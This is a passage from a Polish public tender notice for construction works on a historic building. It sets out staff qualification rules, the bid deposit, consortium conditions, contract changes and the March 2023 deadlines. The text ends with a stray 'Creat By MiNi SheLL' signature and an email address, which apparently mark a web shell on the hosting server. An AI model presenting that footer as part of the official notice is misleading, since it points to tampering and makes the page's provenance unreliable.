postępowaniu: <span class="normal">1. Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności, oraz informację o podstawie do dysponowania tymi osobami.<br/>Potwierdzeniem spełnienia warunku będzie sporządzenie Wykazu osób zawierającego min.:<br/>a) 1 osobę – kierownika budowy, który posiada uprawnienia budowlane w specjalności konstrukcyjno – budowlanej bez ograniczeń do kierowania robotami budowlanymi oraz posiada co najmniej 18–miesięczną praktykę na budowie przy zabytkach nieruchomych, bądź posiada uprawnienia do prowadzenia prac w obiektach zabytkowych potwierdzone stosownym zaświadczeniem Wojewódzkiego Konserwatora Zabytków, zgodnie z art. 37c ustawy o ochronie zabytków i opiece nad zabytkami;<br/>b) 1 osobę – kierownika robót elektrycznych, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych zgodnie z przepisami ustawy Prawo Budowlane i Rozporządzeniem w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>c) 1 osobę – kierownika robót sanitarnych, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z przepisami ustawy Prawo Budowlane i Rozporządzeniem w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>W zakresie potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający dopuszcza uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>2. Wykaz robót budowlanych, wykonanych należycie, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z dowodami określającymi czy te roboty zostały wykonane należycie.<br/>Potwierdzeniem spełnienia warunku będzie przedstawienie Wykazu robót budowlanych spełniających warunki określone przez Zamawiającego tj.:<br/>Za odpowiadające rodzajem Zamawiający uzna wykonane należycie przez jeden podmiot min. dwie roboty budowlane, których przedmiotem były roboty ogólnobudowlane, przy czym wartość w/w robót budowlanych nie jest mniejsza niż 200 000,00 zł brutto każda.<br/>Dowodami są:<br/>- referencje;<br/>- inne dokumenty potwierdzające należyte wykonanie usług wystawione przez podmiot, na rzecz którego były one wykonane lub są wykonywane;<br/>- inne dokumenty – jeżeli z uzasadnionych przyczyn niezależnych od Wykonawcy nie jest on w stanie uzyskać wyżej wskazanych dokumentów.<br/>W razie konieczności, szczególnie gdy Wykaz robót budowlanych lub inne złożone przez Wykonawcę dokumenty budzą wątpliwości Zamawiającego, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty były wykonane, o dodatkowe informacje lub dokumenty w tym zakresie.<br/>W przypadku, gdy wartości podawane w dowodach potwierdzających spełnienie warunków udziału w postępowaniu będą wyrażone w innych walutach niż złoty, muszą zostać przeliczone przez Wykonawcę wg odpowiednio Tabeli A lub Tabeli B kursów średnich walut obcych NBP, aktualnej na dzień wystawienia dowodu i wpisane na tym samym dowodzie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty należy dołączyć:<br/>1) jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów rejestrowych (ofertę składa pełnomocnik) – pełnomocnictwo potwierdzające umocowanie do reprezentowania Wykonawcy;<br/>2) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez wykonawców wspólnie ubiegających się o udzielenie zamówienia – jeżeli dotyczy;<br/>3) Kosztorys ofertowy;<br/>4) Oświadczenie, które wstępnie potwierdzi, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu;<br/>W przypadku wspólnego ubiegania się o zamówienia przez wykonawców, Oświadczenie składa każdy z Wykonawców;<br/>5) Oświadczenie art. 117 ust. 4 PZP wykonawców wspólnie ubiegających się o zamówienie, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy;<br/>6) Zobowiązanie podmiotu udostępniającego zasoby oraz Oświadczenie podmiotu udostępniającego zasoby – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do złożenia oferty, każdy Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert, o którym mowa w Rozdziale XV ust. 1 SWZ.<br/>2. Wysokość wadium wynosi: 8 000,00 zł; <br/>3.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>3.1. pieniądzu;<br/>3.2. gwarancjach bankowych;<br/>3.3. gwarancjach ubezpieczeniowych;<br/>3.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Zasady wniesienia wadium w formie pieniądza:<br/>4.1. Wadium wnoszone w pieniądzu wpłaca się przelewem na następujący rachunek bankowy Zamawiającego: <br/>Bank Gospodarstwa Krajowego<br/>Nr rachunku bankowego: 17 1130 1017 0021 1002 5190 0004 <br/>tytuł przelewu: ,,Wadium G–2502–2/23”<br/>4.2. Za termin wniesienia wadium w formie pieniężnej uznaje się termin uznania rachunku bankowego Zamawiającego, o którym mowa w Rozdziale XII ust. 4.1. SWZ, co oznacza, że wymagana kwota wadium musi być zaksięgowana na koncie Zamawiającego przed upływem terminu składania ofert, o którym mowa w Rozdziale XV ust. 1 SWZ (tj. przed upływem dnia <br/>i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>5. Zasady wniesienia wadium w formie gwarancji lub poręczeń, o których mowa w Rozdziale XII ust. 3.2.–3.4. SWZ:<br/>5.1. Wadium wnoszone w formie poręczeń lub gwarancji, o których mowa w Rozdziale XII ust. 3.2.–3.4. SWZ – należy złożyć za pośrednictwem Platformy w oryginale w postaci elektronicznej.<br/>5.2. Wadium wnoszone w formie poręczeń lub gwarancji o których mowa w Rozdziale XII ust. 3.2.–3.4. SWZ musi być przekazane przez gwaranta lub poręczyciela za pośrednictwem Wykonawcy.<br/>5.3. Wadium wnoszone w formie poręczeń lub gwarancji, o których mowa w Rozdziale XII ust. 3.2.–3.4. SWZ – ma mieć formę gwarancji lub poręczeń, z treści których jednoznacznie będzie wynikać zagwarantowane prawo Zamawiającego do egzekwowania należności bez zwłoki tzn. na pierwsze żądanie i bezwarunkowo w każdej z sytuacji opisanych w PZP. Termin ważności w/w dokumentów musi się pokrywać z terminem związania ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego (lider konsorcjum). Pełnomocnik konsorcjum winien zalogować się na<br/>swoim profilu Wykonawcy i składając ofertę w zakładce „Wykonawcy&#34; dodać pozostałych Wykonawców wpisując ich dane.<br/>Pełnomocnictwo należy dołączyć do oferty.<br/>2. Pełnomocnictwo musi być złożone w oryginale w takiej samej formie, jak składana oferta tj. w formie elektronicznej<br/>(opatrzonej elektronicznym podpisem kwalifikowanym) lub w postaci elektronicznej (opatrzonej podpisem zaufanym lub<br/>podpisem osobistym).<br/>Dopuszcza się także złożenie cyfrowego odwzorowania pełnomocnictwa (np. skanu) sporządzonego uprzednio w formie<br/>pisemnej, opatrzonego: kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności<br/>cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej dokonuje mocodawca (opatrzonego kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym) lub notariusz (w formie elektronicznego<br/>poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy Prawo o notariacie, które to poświadczenie notariusz<br/>opatruje kwalifikowanym podpisem elektronicznym). Cyfrowe odwzorowanie pełnomocnictwa nie może być poświadczone<br/>przez upełnomocnionego.<br/>3. Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego<br/>Zamawiający kieruje informacje, korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące<br/>dla wszystkich wykonawców składających ofertę wspólną.<br/>4. Nie dopuszcza się uczestniczenia któregokolwiek z wykonawców wspólnie ubiegających się o udzielenie zamówienia w<br/>więcej niż jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym jest również<br/>złożenie przez któregokolwiek z wykonawców wspólnie ubiegających się o udzielenie zamówienia, równocześnie oferty<br/>indywidualnej oraz w ramach grupy wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Oświadczenie składa każdy z<br/>wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te wstępnie potwierdzają spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, w tym oświadczenie dotyczące<br/>przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>7. Zamawiający, w stosunku do wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej nie dopuszcza łącznego spełniania warunku przez tych wykonawców.<br/>8. W odniesieniu do warunków dotyczących doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>9. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty Oświadczenie art. 117 ust. 4 PZP, z<br/>którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. Oświadczenie to musi zostać podpisane przez<br/>wszystkich wykonawców wspólnie ubiegających się o zamówienie lub przez pełnomocnika, uprawnionego do podpisania<br/>tego oświadczenia.<br/>10. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed zawarciem umowy w sprawie zamówienia publicznego Zamawiający będzie żądał przedłożenia mu kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w dokumentach zamówienia w postaci jasnych, precyzyjnych i jednoznacznych postanowień umownych.<br/>2. Zakazuje się zmian istotnych postanowień Umowy, w stosunku do treści oferty, z zastrzeżeniem § 8 ust. 3 Umowy.<br/>3. Dopuszcza się zmiany istotnych postanowień zawartej umowy w następującym zakresie i przy spełnieniu następujących warunków:<br/>1) zmiana terminu wykonania przedmiotu umowy, o którym mowa w § 3 ust. 1 Umowy, jest możliwa za zgodą obu Stron umowy, w przypadku zaistnienia okoliczności niezależnych od Stron Umowy, których nie można było przewidzieć w chwili zawarcia umowy. Okolicznościami takimi będą w szczególności:<br/>a) działania lub zaniechania osób trzecich (np. organów administracji publicznej i innych podmiotów uczestniczących w procedurze opiniowania i uchwalania);<br/>b) złożenie skargi lub wniosku do właściwych organów administracyjnych lub sądowych lub odwołania od ich rozstrzygnięcia, o ile będą mogły mieć wpływ na zmianę terminu wykonania przedmiotu umowy;<br/>c) w przypadku gdy niedotrzymanie pierwotnego terminu wykonania przedmiotu umowy stanowi konsekwencję okoliczności niezależnych od Wykonawcy i nie stanowi jego i podwykonawców problemów organizacyjnych;<br/>d) konieczności wprowadzenia zmian projektowych wynikających z niemożliwych do przewidzenia przeszkód w wykonaniu przedmiotu umowy zgodnie z projektem pierwotnym;<br/>2) w przypadku wystąpienia siły wyższej możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy. Zakres zmiany umowy będzie wynikać z wpływu siły wyższej na możliwość wykonania umowy;<br/>3) w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu lub wykładni zapisów albo pojęć użytych w umowie, SWZ lub załącznikach do niej, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy;<br/>4) dopuszcza się zmiany umowy dotyczące poprawienia błędów i oczywistych omyłek słownych, literowych i liczbowych, zmiany układu graficznego umowy lub numeracji jednostek redakcyjnych, niepowodujące zmiany celu i istoty umowy, przy czym wymaga to zgody obu Stron umowy;<br/>5) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy (m.in. w razie zmiany przepisów normujących zagadnienia struktury organizacyjnej sądownictwa powszechnego). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać przy użyciu środków komunikacji elektronicznej na Platformie dostępnej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com